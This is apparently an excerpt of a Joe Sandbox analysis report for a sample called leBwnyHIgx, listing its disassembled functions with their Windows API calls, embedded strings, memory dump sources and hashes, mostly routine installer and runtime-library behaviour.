                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                    • String ID:
                                                                                    • API String ID: 2933794660-0
                                                                                    • Opcode ID: 842f5c9d0410f161de26bc26939d162bf704e3e37519bf8139df35696172d6f0
                                                                                    • Instruction ID: 6b5b90a3d804e5009f3a100d95e0ac76ac391a824cc924ed74941b345312ade6
                                                                                    • Opcode Fuzzy Hash: 842f5c9d0410f161de26bc26939d162bf704e3e37519bf8139df35696172d6f0
                                                                                    • Instruction Fuzzy Hash: 2CF05F74D1021DEBDB41DBB4CA8999EBBF4EF1C204BA18695E412E6110E630AB489B50
                                                                                    Function 00CE6BCB Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 00CE6BDD
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00CE6BEC
                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00CE6BF5
                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00CE6C02
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                    • String ID:
                                                                                    • API String ID: 2933794660-0
                                                                                    • Opcode ID: 842f5c9d0410f161de26bc26939d162bf704e3e37519bf8139df35696172d6f0
                                                                                    • Instruction ID: 6b5b90a3d804e5009f3a100d95e0ac76ac391a824cc924ed74941b345312ade6
                                                                                    • Opcode Fuzzy Hash: 842f5c9d0410f161de26bc26939d162bf704e3e37519bf8139df35696172d6f0
                                                                                    • Instruction Fuzzy Hash: 2CF05F74D1021DEBDB41DBB4CA8999EBBF4EF1C204BA18695E412E6110E630AB489B50
                                                                                    Function 00645F94 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 148windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendNotifyMessageW.USER32(?,00000496,00002711,-00000001), ref: 006461BC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageNotifySend
                                                                                    • String ID: HW[$MS PGothic
                                                                                    • API String ID: 3556456075-2635353643
                                                                                    • Opcode ID: 59f04f6aee3bffc9c1295158f9acede3f64b47b25c96f5cb70cb93cdb20aa1c8
                                                                                    • Instruction ID: bceb75bb431b8eb4c574679ca4a5eb6d1cf06a39740a1e3265182ded441c346e
                                                                                    • Opcode Fuzzy Hash: 59f04f6aee3bffc9c1295158f9acede3f64b47b25c96f5cb70cb93cdb20aa1c8
                                                                                    • Instruction Fuzzy Hash: EC5140703102018BCB10EF69D985E967BA3FB55304B14517AF845AF3A7CA78EC46CF9A
                                                                                    Function 10005540 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10005573
                                                                                    • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 10005672
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::task_continuation_context::task_continuation_contextFileModuleName
                                                                                    • String ID: .exe
                                                                                    • API String ID: 2188046178-4119554291
                                                                                    • Opcode ID: c8dc7b2a76f962d9c9e5e2295d0bb392a2ad8b6eac705aa3666f7bffbb178c74
                                                                                    • Instruction ID: 322e95b2db96aea7f088eda3d8bee12a526519093e635f9f9e857dc9ab2affb0
                                                                                    • Opcode Fuzzy Hash: c8dc7b2a76f962d9c9e5e2295d0bb392a2ad8b6eac705aa3666f7bffbb178c74
                                                                                    • Instruction Fuzzy Hash: 15513774C04248EFEB15CBA4CC91BEEBBB5EF15300F148199E1167B296DB746B48CBA1
                                                                                    Function 005F8B78 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,005F8C6D,?,0066978C,?,00000003,00000000,00000000,?,006444C3,00000000,006445EE), ref: 005F8BC0
                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,00000000,005F8C6D,?,0066978C,?,00000003,00000000,00000000,?,006444C3,00000000,006445EE), ref: 005F8BC9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID: .tmp
                                                                                    • API String ID: 1375471231-2986845003
                                                                                    • Opcode ID: 0dd2e78ac53445f243b90664175e46d6b94ca7fdf7539982ce6cd959b1b8a79f
                                                                                    • Instruction ID: c4b9951d0c9cc56d7ffc3af5a52d4afc2fe12c17b36d5983631b7f23f90a8f37
                                                                                    • Opcode Fuzzy Hash: 0dd2e78ac53445f243b90664175e46d6b94ca7fdf7539982ce6cd959b1b8a79f
                                                                                    • Instruction Fuzzy Hash: 32214675A0010D9FDB00EBA4C956AFEB7F9FB88304F50457AF900B7381DA386E058AA4
                                                                                    Function 0064EC32 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 0064EC72
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window
                                                                                    • String ID: /INITPROCWND=$%x $@
                                                                                    • API String ID: 2353593579-4169826103
                                                                                    • Opcode ID: 10bae26bf5f2a0ea0e044a5652ad93d77c5c1b14996636414ded1eee9e9c8fb2
                                                                                    • Instruction ID: 8b2991d2d1f953f99e0989ce018fc3471add5941c41498d69d44fc2df87f3202
                                                                                    • Opcode Fuzzy Hash: 10bae26bf5f2a0ea0e044a5652ad93d77c5c1b14996636414ded1eee9e9c8fb2
                                                                                    • Instruction Fuzzy Hash: A321A234A043499FDB04EBA4DC91EEEBBF6FF49304F64447AE500E7291DA799904C754
                                                                                    Function 10016D47 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10016D88
                                                                                    • ___raise_securityfailure.LIBCMT ref: 10016E70
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                    • String ID: r<e
                                                                                    • API String ID: 3761405300-3210016143
                                                                                    • Opcode ID: 450f55da5f99c408a49f7ed2eee0c8ae3ebd1ba68c36369af010e05196f36eeb
                                                                                    • Instruction ID: a67c13fa0676d0ded6a491c3c047187990066a390ac77e1bb819cc9b9643fb58
                                                                                    • Opcode Fuzzy Hash: 450f55da5f99c408a49f7ed2eee0c8ae3ebd1ba68c36369af010e05196f36eeb
                                                                                    • Instruction Fuzzy Hash: E621B0B5A08328DBF705CF28DDE5E647BB4FB09704F10D12AE5049B2A1E3B0D685CB45
                                                                                    Function 00CE6D1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CE6D5F
                                                                                    • ___raise_securityfailure.LIBCMT ref: 00CE6E47
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                    • String ID: r<e
                                                                                    • API String ID: 3761405300-3210016143
                                                                                    • Opcode ID: 450f55da5f99c408a49f7ed2eee0c8ae3ebd1ba68c36369af010e05196f36eeb
                                                                                    • Instruction ID: ab00a3611c5fd8ed0a2b33da80d7814ed93805dc9c4decfa6144dfacafea3fa9
                                                                                    • Opcode Fuzzy Hash: 450f55da5f99c408a49f7ed2eee0c8ae3ebd1ba68c36369af010e05196f36eeb
                                                                                    • Instruction Fuzzy Hash: DD21EFB4618328DBF714CF29DDE1E647BA4BB09704F10D12AE6149B3A0E3B0DA84CF44
                                                                                    Function 0064FAA7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005FA9A8: GetCurrentProcess.KERNEL32(00000028), ref: 005FA9B8
                                                                                      • Part of subcall function 005FA9A8: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 005FA9BE
                                                                                    • SetForegroundWindow.USER32(?), ref: 0064FAE0
                                                                                    Strings
                                                                                    • Restarting Windows., xrefs: 0064FAB7
                                                                                    • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 0064FB17
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                                    • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                                                    • API String ID: 3179053593-4147564754
                                                                                    • Opcode ID: 6f7ce231d12e7b0590e1307c51da8fb0449973e99580584b367fabd86af75305
                                                                                    • Instruction ID: d4bf9f36ef96bf7cd5cd4c99b625b6b1cd4e930e58df0cf614d5cda783460847
                                                                                    • Opcode Fuzzy Hash: 6f7ce231d12e7b0590e1307c51da8fb0449973e99580584b367fabd86af75305
                                                                                    • Instruction Fuzzy Hash: 341182346002449FEB04EB94E896FD837E6EB46304F5150BAF804AB3E2CB78AD41C716
                                                                                    Function 004085D8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateThread.KERNEL32(00000000,lF,004085A0,00000000,?,lF), ref: 00408632
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID: lF$lF
                                                                                    • API String ID: 2422867632-1147170537
                                                                                    • Opcode ID: 92e9bf36f33061f7ffdd7491b72976703523c6d92d1ec2ca90417502ef735539
                                                                                    • Instruction ID: c79f99a2a18cb61d71feea710bf58fa565dd156bb3bf8665f6744fc7077f86ea
                                                                                    • Opcode Fuzzy Hash: 92e9bf36f33061f7ffdd7491b72976703523c6d92d1ec2ca90417502ef735539
                                                                                    • Instruction Fuzzy Hash: 33017171605214AFC750CF9D9980B8EB7ECDB58361F10443AF508E73C1DA75DD0087A8
                                                                                    Function 00412B68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(00000000,TWindowDisabler-Window,?,B)[,?,?,?,00000001,00000000,?,00619EC3,0066978C), ref: 00412BA7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID: B)[$TWindowDisabler-Window
                                                                                    • API String ID: 716092398-1377837600
                                                                                    • Opcode ID: 684ecf370dcf3c6758cf9d82a20f104a3e22c221ceaad4062406452089a2450d
                                                                                    • Instruction ID: d28f3a87fa927ce1738d04863a1b4a791b24e040aa09da8391ad3ec004184475
                                                                                    • Opcode Fuzzy Hash: 684ecf370dcf3c6758cf9d82a20f104a3e22c221ceaad4062406452089a2450d
                                                                                    • Instruction Fuzzy Hash: 74F074B2604118AF8B40DE9DDC81EDB77ECEB4D264B05412ABA08E3201D634ED118BA4
                                                                                    Function 004309F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(2C), ref: 00430A04
                                                                                      • Part of subcall function 00408B6C: SysReAllocStringLen.OLEAUT32(00000000,?,00000071), ref: 00408B86
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocInitStringVariant
                                                                                    • String ID: 2C$WC
                                                                                    • API String ID: 4010818693-495268985
                                                                                    • Opcode ID: df370b3d9da647af4402dd277e6d6925b7b152161429339756cd47c20e76cd35
                                                                                    • Instruction ID: 96bda85ea37abc6d5613da839bc8b5d910035a35706cb6c2dd4bd2584f76f0b9
                                                                                    • Opcode Fuzzy Hash: df370b3d9da647af4402dd277e6d6925b7b152161429339756cd47c20e76cd35
                                                                                    • Instruction Fuzzy Hash: F1F0A471700608AFD700EB99DC92E9FB3FCEB48700FA04176F500E3290DA78AE0486A9
                                                                                    Function 00643D50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0064413B,00000000,00644156,?,00000000,00000000,?,0064F4D6,00000006), ref: 00643DB2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID: RegisteredOrganization$RegisteredOwner
                                                                                    • API String ID: 3535843008-1113070880
                                                                                    • Opcode ID: 301571e57bfd22d937d0251fdeb13fcc7fbfda80df1ff37fee867360dc904415
                                                                                    • Instruction ID: 79ba88330415bd06f82effed11eda8edd571365fffeee20c77ff8264b35cb024
                                                                                    • Opcode Fuzzy Hash: 301571e57bfd22d937d0251fdeb13fcc7fbfda80df1ff37fee867360dc904415
                                                                                    • Instruction Fuzzy Hash: E9F0B470B04194AFDB10DAD4DD46BAA7BAFEF85344F241029E2409B391D6B0EF40CB55
                                                                                    Function 0065061C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 006449EC: FreeLibrary.KERNEL32(?,00650648,00000000,00650657,?,?,?,?,?,0065113B), ref: 00644A02
                                                                                      • Part of subcall function 006446DC: GetTickCount.KERNEL32 ref: 00644724
                                                                                      • Part of subcall function 00600808: SendMessageW.USER32(?,00000B01,00000000,00000000), ref: 00600827
                                                                                    • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0065113B), ref: 00650671
                                                                                    • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0065113B), ref: 00650677
                                                                                    Strings
